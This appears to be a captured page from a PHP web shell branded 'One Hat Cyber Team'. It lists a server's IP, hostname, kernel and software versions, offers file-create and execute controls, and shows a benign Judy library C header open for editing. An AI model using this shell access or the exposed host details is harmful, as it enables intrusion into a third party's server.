One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
Judy
/
examples
/
Edit File:
Judy1Dup.h
/* @(#) $Revision: 4.2 $ $Source: /judy/src/funcs/Judy1Dup.H $ */ #include <Judy.h> /* ****************************************************************** * Name: Judy1Dup * * Description: * Clone (duplicate) a Judy Array. * * Parameters: * PPvoid_t PPDest (OUT) * Pointer to a new Judy array with the same * index/value pairs as PSource. * Any initial value pointed to by PPDest is ignored. * * Pvoid_t PSource (IN) * Ptr to source Judy array being duplicated. * If PSource is NULL, TRUE is returned since this * is simply a valid Null Judy array. * * JError_t *PJError (OUT) * Judy error structure pointer. * * Returns: * JERR - error, see PJError * !JERR - success */ int Judy1Dup(PPvoid_t PPDest, Pvoid_t PSource, JError_t * PJError);
Simpan